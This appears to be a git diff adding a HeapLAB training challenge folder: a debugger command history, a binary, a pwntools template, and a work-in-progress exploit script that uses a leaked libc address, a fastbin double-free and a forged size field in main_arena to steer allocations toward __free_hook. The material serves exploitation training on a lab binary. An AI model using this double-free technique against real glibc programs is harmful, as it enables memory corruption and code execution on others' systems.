diff options
Diffstat (limited to 'HeapLAB/challenge-fastbin_dup')
-rw-r--r-- | HeapLAB/challenge-fastbin_dup/.gdb_history | 256 | ||||
-rwxr-xr-x | HeapLAB/challenge-fastbin_dup/bruh.py | 83 | ||||
-rwxr-xr-x | HeapLAB/challenge-fastbin_dup/fastbin_dup_2 | bin | 0 -> 15792 bytes | |||
-rwxr-xr-x | HeapLAB/challenge-fastbin_dup/pwntools_template.py | 60 |
4 files changed, 399 insertions, 0 deletions
diff --git a/HeapLAB/challenge-fastbin_dup/.gdb_history b/HeapLAB/challenge-fastbin_dup/.gdb_history new file mode 100644 index 0000000..b2cbfcb --- /dev/null +++ b/HeapLAB/challenge-fastbin_dup/.gdb_history @@ -0,0 +1,256 @@ +x &main_arena +x/100x &main_arena +print main_arena +fastbins +q +fastbins +fastbins +c +exit +quit +quit +fastbins +print main_arena +q +print main_arena +q +vis_heap_chunks +print main_arena +db main_arena +db &main_arena +db &main_arena/100 +db &main_arena 100 +db &main_arena 1000 +x main_arena.top +x &main_arena.top +db &main_arena 100 +c +fastbins +print main_arena +x main_arena.fasbinsY +x &main_arena.fastbinsY +quit +fastbins +x 0x7f0946700b70 +db 0x7f0946700b70 100 +q +fastbins +q +fastbins +q +fastbinsx +db &main_arena 100 +q +db 0x7f2e5c845b60 +0x7f2e5c845b70 + 16 +x 0x7f2e5c845b70 + 16 +x 0x7f2e5c845b70 +x 0x7f2e5c845b70 +x 0x7f2e5c845b60 +vis_heap_chunks +db 0x7f0ba6e3db70 +db 0x555bdeaca000 100 +db 0x7f0ba6e3db70 +db 0x7f0ba6e3db70 - 8 +db 0x7f0ba6e3db70-8 +db 0x7f0ba6e3db70-7 +q +x 0x7fcf882cbb69 +db 0x7fcf882cbb69 +q +vis_heap_chunks +print main_arena +q +print main_arena +vis_heap_chunks +q +print main_arena +q +print main_arena +fastbins +r +q +r +c +fastbisn +vis_heap_chunks +fastbins +quit +fastbins +print main_arena +c +print main_arena +q +print main_arena +print main_arena +x malloc_free_hook +x __free_hook +x &__free_hook +x &__free_hook 100 +db &__free_hook 100 +q +q +q +q +print main_arena +db 0x7f4858584e10 +c +print victim +q +fastbins +c +x idx +x chunksize(p) +x chunksize +x p +fastbins +q +x __free_hook +x &__free_hook 100 +db &__free_hook 100 +db &__free_hook - 100 +db &__free_hook-100 +db &__free_hook-100 100 +print main_arena +x 0x7fca0f75fe10 +x/100 0x7fca0f75fe10 +x/100 0x7fca0f75fe10-100 +c +q +break malloc +c +fastbins +x __free_hook +fastins +fastbins +print main_arena +x 0x7f072b59ee10 +break malloc +break free +continue +c +c +c +print main_arena +vis_heap_chunks +vis_heap_chunks +c +vis_heap_chunks +break free +break malloc +c +print main_arena +x &__free_hook - 16 +q +print main_arena +vis_heap_chunks +c +c +c +q +db __malloc_hook +db &__malloc_hook +x __malloc_hook +x &__malloc_hook +c +break sysmalloc +c +frame 2 +context +c +break main +c +q +x &__malloc_hook +print __malloc_hook +print &__malloc_hook +print __main_arena +print main_arena +print main_arena +x __malloc_hook +x &__malloc_hook +db &__malloc_hook +db &__malloc_hook-100 100 +db &__malloc_hook-100 100*8 +db &__malloc_hook-100 (100*8)+1 +fastbins +c +print main_arena +x __malloc_hook +x &__malloc_hook +db &__malloc_hook-100 (100*8)+1 +c +db &__malloc_hook-100 (100*8)+1 +print main_arena +x 0x7f5b07a18b40 +break malloc +c +c +c +q +break __libc_malloc +break malloc +break __malloc_hook +b __malloc_hook +b &__malloc_hook +b *__malloc_hook +b *&__malloc_hook +c +delete 3 +c +pwndbg heap +vis_heap_chunks +print __mallinfo +x __mallinfo +print &__mallinfo +print *__mallinfo +print __mallinfo +print &__mallinfo +print main_arena +c +break malloc +c +x main_arena.top_check +x main_arena.top_chunk +print main_arena +x 0x7f4854db6b40 +x 0x7f4854db6b40 +x 0x7f4854db6b40 +c +x 0x7f4854db6b40 +fastbins +c +x 0x7f4854db6b40 +c +x 0x7f4854db6b40 +x main_arena +x &main_arena +x &__malloc_hook +x main_arena.top +db main_arena.top +c +c +c +q +print __malloc_hook +print __malloc_hook +fastbins +c +fastbins +c +vis_heap_chunks +c +fastbins +r +c +fastbins +print main_arena +vis_heap +c +fastbins +fastbins +c +fastbins +r +c + quit diff --git a/HeapLAB/challenge-fastbin_dup/bruh.py b/HeapLAB/challenge-fastbin_dup/bruh.py new file mode 100755 index 0000000..191cbea --- /dev/null +++ b/HeapLAB/challenge-fastbin_dup/bruh.py @@ -0,0 +1,83 @@ +#!/usr/bin/python3 +from pwn import * + +elf = context.binary = ELF("fastbin_dup_2") +libc = elf.libc + +context.terminal = ['kitty', 'bash', '-c'] + +gs = ''' +continue +''' +def start(): + if args.GDB: + return gdb.debug(elf.path, gdbscript=gs) + else: + return process(elf.path) + +# Index of allocated chunks. +index = 0 + +# Select the "malloc" option; send size & data. +# Returns chunk index. +def malloc(size, data): + global index + io.send("1") + io.sendafter("size: ", f"{size}") + io.sendafter("data: ", data) + io.recvuntil("> ") + index += 1 + return index - 1 + +# Select the "free" option; send index. +def free(index): + io.send("2") + io.sendafter("index: ", f"{index}") + io.recvuntil("> ") + +io = start() + +# This binary leaks the address of puts(), use it to resolve the libc load address. +io.recvuntil("puts() @ ") +libc.address = int(io.recvline(), 16) - libc.sym.puts +io.timeout = 0.1 + +# ============================================================================= + +#13 chunks + +chunk1 = malloc(24, 'abcd') +chunk2 = malloc(24, 'abcc') + +free(chunk1) +free(chunk2) +free(chunk1) + +#malloc(24, p64(libc.sym.main_arena + 96)) +#this sets up a fake size field in the fastbins +malloc(24, p64(0x81)) +malloc(24, 'asdf') +malloc(24, 'asdf') + +chunk_b1 = malloc(119, 'asdf') +chunk_b2 = malloc(119, 'asdf') + +free(chunk_b1) +free(chunk_b2) +free(chunk_b1) + +fake_chunk_loc = libc.sym.main_arena + 8 # begining of fastbin array + +malloc(119, p64(fake_chunk_loc)) +malloc(119, 'asdf') +malloc(119, 'sdfg') + +#8 * 9 + +malloc(119, p64(0)*9 + p64(libc.sym.__free_hook - 16)) + +print(hex(fake_chunk_loc)) + +# ============================================================================= + +io.interactive() diff --git a/HeapLAB/challenge-fastbin_dup/fastbin_dup_2 b/HeapLAB/challenge-fastbin_dup/fastbin_dup_2 Binary files differnew file mode 100755 index 0000000..faa0249 --- /dev/null +++ b/HeapLAB/challenge-fastbin_dup/fastbin_dup_2 diff --git a/HeapLAB/challenge-fastbin_dup/pwntools_template.py b/HeapLAB/challenge-fastbin_dup/pwntools_template.py new file mode 100755 index 0000000..1faaaf8 --- /dev/null +++ b/HeapLAB/challenge-fastbin_dup/pwntools_template.py @@ -0,0 +1,60 @@ +#!/usr/bin/python3 +from pwn import * + +elf = context.binary = ELF("fastbin_dup_2") +libc = elf.libc + +#gs = ''' +#continue +#''' +gs = ''' +break main +''' +def start(): + if args.GDB: + return gdb.debug(elf.path, gdbscript=gs) + else: + return process(elf.path) + +# Index of allocated chunks. +index = 0 + +# Select the "malloc" option; send size & data. +# Returns chunk index. +def malloc(size, data): + global index + io.send("1") + io.sendafter("size: ", f"{size}") + io.sendafter("data: ", data) + io.recvuntil("> ") + index += 1 + return index - 1 + +# Select the "free" option; send index. +def free(index): + io.send("2") + io.sendafter("index: ", f"{index}") + io.recvuntil("> ") + +io = start() + +# This binary leaks the address of puts(), use it to resolve the libc load address. +io.recvuntil("puts() @ ") +libc.address = int(io.recvline(), 16) - libc.sym.puts +io.timeout = 0.1 + +# ============================================================================= + +# =-=-=- EXAMPLE -=-=-= + +# Request two 0x50-sized chunks. +chunk_A = malloc(0x48, "A"*8) +chunk_B = malloc(0x48, "B"*8) + +# Free the first chunk, then the second. +free(chunk_A) +free(chunk_B) + +# ============================================================================= + +io.interactive() |